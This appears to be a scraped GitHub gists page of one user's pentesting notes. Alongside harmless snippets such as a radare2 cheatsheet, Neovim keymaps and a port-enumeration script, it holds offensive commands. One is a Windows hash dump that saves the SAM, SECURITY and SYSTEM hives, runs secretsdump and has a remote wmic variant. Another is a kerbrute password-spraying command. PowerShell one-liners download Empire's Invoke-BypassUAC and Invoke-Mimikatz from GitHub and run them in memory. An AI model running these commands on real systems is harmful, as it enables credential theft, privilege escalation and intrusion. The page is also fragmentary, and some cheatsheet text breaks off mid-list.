load without any analysis (file header at offset 0x0): r2 -n /path/to/file
- analyze all:
aa - show sections:
iS - list functions:
afl - list imports:
ii - list entrypoints:
ie - seek to function:
s sym.main
adamdekan
/ portidentiy.py
Created
December 2, 2023 10:43
Download .csv of all ports from Iana and this script identifies numbers + creates according folders for enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import csv | |
| import argparse | |
| import os | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument('number', type=str) | |
| parser.add_argument('-o', type=str, help='Output folder for files') | |
| args = parser.parse_args() | |
| ports = args.number.split(',') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cmd () { | |
| arg=${1} | |
| print -z -- $(rg ^$1 ~/obsidian/ | sed 's/^[^:]*://' | fzf ) | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Check if the correct number of arguments is provided | |
| if [ "$#" -ne 2 ]; then | |
| echo "Usage: $0 <target_host> <output_folder>" | |
| exit 1 | |
| fi | |
| # Replace 'localhost' with the target host parameter | |
| rustscan -a "$1" -g | sed 's/.*\[\(.*\)\].*/\1/' | xargs python3 ~/python/portidentify.py -o "$2" |
adamdekan
/ hashdump.reg
Created
December 8, 2023 21:53
— forked from sh1n0b1/hashdump.reg
Windows local Hash Dump
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reg.exe save hklm\sam c:\temp\sam.save | |
| reg.exe save hklm\security c:\temp\security.save | |
| reg.exe save hklm\system c:\temp\system.save | |
| secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | |
| #https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py | |
| #Do this remotely | |
| wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save" |
adamdekan
/ yet another radare2 cheatsheet.md
Last active
December 29, 2023 10:59
— forked from williballenthin/yet another radare2 cheatsheet.md
adamdekan
/ kerberos_attacks_cheatsheet.md
Created
January 12, 2024 12:27
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
- Users / Groups / Computers
- Domain Controller
- Service Principal Names (SPNs)
- Logged-in Users and Active User Sessions
- Dumping NTLM hashes and Plaintext Credentials
adamdekan
/ pentesting_cheatsheet.ps1
Created
January 25, 2024 16:02
— forked from moscowchill/pentesting_cheatsheet.ps1
Intern Pentesting notes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| #Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| #Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| #Import Mimikatz Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| vim.keymap.set({ 'n', 'v' }, '<Space>', '<Nop>', { silent = true }) | |
| vim.keymap.set({ 'n', 'v' }, '<C-s>', ':w<enter>', { silent = true }) | |
| vim.keymap.set({ 'n', 'v' }, '<leader>rr', ':w<enter>:!python3 %<enter>', { silent = true , desc = 'Run Python file'}) | |
| vim.keymap.set({ 'n', 'v' }, '<C-d>', '<C-d>zz', { silent = true }) | |
| vim.keymap.set({ 'n', 'v' }, '<C-u>', '<C-u>zz', { silent = true }) | |
| vim.keymap.set('n', '<leader>qq', ':q!<enter>', { silent = true }) | |
| vim.keymap.set('n', 'n', 'nzz', { silent = true }) | |
| vim.keymap.set('n', 'N', 'Nzz', { silent = true }) | |
| vim.keymap.set('n', '*', '*zz', { silent = true }) | |
| vim.keymap.set('n', '<S-h>', ':bprevious<enter>', { silent = true }) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sort -t . -k 3,3n -k 4,4n |
OlderNewer